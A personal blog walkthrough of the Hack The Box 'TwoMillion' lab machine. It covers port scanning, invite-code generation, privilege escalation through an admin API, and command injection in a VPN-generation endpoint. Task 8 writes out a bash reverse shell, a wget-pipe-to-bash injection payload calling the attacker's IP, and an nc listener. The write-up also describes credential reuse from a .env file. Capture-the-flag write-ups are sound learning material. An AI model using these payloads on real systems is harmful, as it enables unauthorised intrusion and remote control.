---
title: "TwoMillion HTB"
date: 2023-09-03 00:00:00 +0800
categories: [Hack The Box]
tags: [HacktheBox]
---

# TwoMillion HacktheBox

[HackTheBox-TwoMillion-Easy](https://app.hackthebox.com/machines/TwoMillion)

This is my first Hack the box (HTB) for me, and here I write the walkthrough on gathering the flags.

## Introduction

First and foremost, we need to be in the same network as the target machine by using OpenVPN file configuration provided by HTB. Then we can start the target machine and HTB will provide us with an IP address (10.10.11.221). As it is my first box on HTB I decided to go through the challenge in guided mode as it can give me guidance to complete it. I have been used Kali Linux as the attacker box.

---

## Task 1

### How many TCP ports are open?
1. Try to ping the given IP first.
	```
	ping 10.10.11.221 
	``` 
2. Use the nmap as command below to ping TCP
	```
	nmap -sT -Pn 10.10.11.221
	```
Then we know there are 2 TCP ports open, **80** and **22**.
However we could use a better nmap command as below to gather more information. We could know the service version with **-sV** and using the default nmap scripting engine (NSE) with **-sC**.
```
nmap -sV -sC 10.10.11.221
```
After execute the above nmap command, we know the default domain name for the web on port 80. Thus, we could edit our /etc/hosts file to set the domain name with it's IP address 10.10.11.221.
## Task 2

### What is the name of the JavaScript file loaded by the `/invite` page that has to do with invite codes?

1. Go to 2million.htb/invite and the page request us an invite code to sign up.
2. Inspect the page and we could find the script used which are **inviteapi.min.js**.

## Task 3
### What JavaScript function on the invite page returns the first hint about how to get an invite code?
1. To read the **inviteapi.min.js** script we can go to debugger tab and read the script under the js directory. Click **{}** to make the code pretty and easy to read.
2. After read and analyzing the script we could identify there are some function name listed on the bottom of the script. One of it is **makeInviteCode**.
3. We can go to console tab and run the **makeInviteCode()** function. It returns us a cipher text encrypted with ROT13 encryption.
4. After decode the cipher text, we now need to go to **/api/v1/invite/generate**.
5. When we try to go to **2million.htb/api/v1/invite/generate** it returns nothing. However when we look at the response on our burpsuite HTTP history which are 405 Method Not Allowed, we could try to use POST method and it does return us some base64 code which turns out to be our invite code.

## Task 4
### On putting a valid code into the form on `/invite`, to what URL path is the browser redirected?
After we insert our invite code obtained before, the page redirect us to a **/register** page.

## Task 5
### What is the path to the endpoint the page uses when a user clicks on "Connection Pack"?
 By simply find the **Connection Pack** within the page, we know the endpoint is **/api/v1/user/vpn/generate**.
 
## Task 6
### How many API endpoints are there under `/api/v1/admin`?
We need to list all the api available for admin and first I try to go to **/api** and it returns 
**/api/v1:	"Version 1 of the API"**. Then I try to go to **/api/v1** where it returns all available api endpoints.

## Task 7
### What API endpoint can change a user account to an admin account?
From the list of api before, we could try the **/api/v1/admin/settings/update** which can update user settings.
1. Try to check our current user is admin or not by using **/api/v1/admin/auth**, which return false.
2. Then use PUT method on **/api/v1/admin/settings/update**, where it return **message : Invalid content type**.
3. We can change the **Content-Type : application/x-ww-form-urlencoded** to **application/json**. Then it response with **message : Missing parameter email**.
4. Put email parameter in json type and it response with **message : Missing parameter: is_admin**. Then we add **is_admin** parameter with value **1**. The response shows us the exploitation is successful.

## Task 8
### What API endpoint has a command injection vulnerability in it?
When looking for command injection vulnerability usually we need to know and identify which service or api that interact with OS. After try and understand all available api endpoint, we noticed that **/api/v1/admin/vpn/generate** required a username parameter to generate a vpn with POST method. The response includes the username parameter at the certificate subject thus the parameter is our entry point to inject a command. 
At first I try to use common way for command injection by using **;** , **|** and **&&**. Lastly, after referring [OWASP: Testing for Command Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection), I try to use special character **$(command)** as below and it returns www-data on the cert subject.
```
$(whoami)
```
Then, I try to create a reverse shell named rev.sh with payload:
```
#!/bin/bash
sh -i >& /dev/tcp/10.10.14.50/9990 0>&1
```
Then I host up python server with command below for the targeted machine to get the rev.sh.
```
python -m http.server 8000
```
Before the targeted machine can connect to us, we need to up our listener simply by using the command:
```
nc -nvlp 9990
```
Then on the burpsuite we can inject command below to make the targeted machine fetch our reverse shell and execute it silently. 
```
$(whoami; wget -q -O- http://10.10.14.50:8000/rev.sh | bash -)
```
The **-q** option is for quiet (no output) which means it won't display progress or status information while downloading the content and **-O-** specifies the output file which means the content will be printed to the standard output (your terminal) rather than saved to a file.
Then the **| bash -** will executing the commands contained within the rev.sh file.

## Task 9
### What file is commonly used in PHP applications to store environment variable values?
Just by simply google, the answer is **.env** file.

## Task 10
## Submit the flag located in the admin user's home directory.
After gaining reverse shell, we could list all files within the current directory with **ls -a** where **.env** file existed. Try to open the file and we found there are database username and password.
Then we go to /home/admin directory where we found user.txt and when we try to open it, **Permission denied**. Using command **ls -al** we know only root and admin are able to read the user.txt.
Thus, we need to login as admin first before we can read the file. Using the database password obtain before in .env file we successfully login as admin and successfully read the user.txt file.

## Task 11
### What is the email address of the sender of the email sent to admin?
The default mail directory of linux is on /var/spool/mail, then after open the mail for admin we know the email address of the sender.

## Task12
### What is the 2023 CVE ID for a vulnerability in that allows an attacker to move files in the Overlay file system while maintaining metadata like the owner and SetUID bits?

BY simply google for linux vulnerability Overlay, we know the CVE.

## Task 13
### Submit the flag located in root's home directory.

By searching the CVE on github, we know how to exploit the vulnerability to escalate our privilage as admin to read the flag.
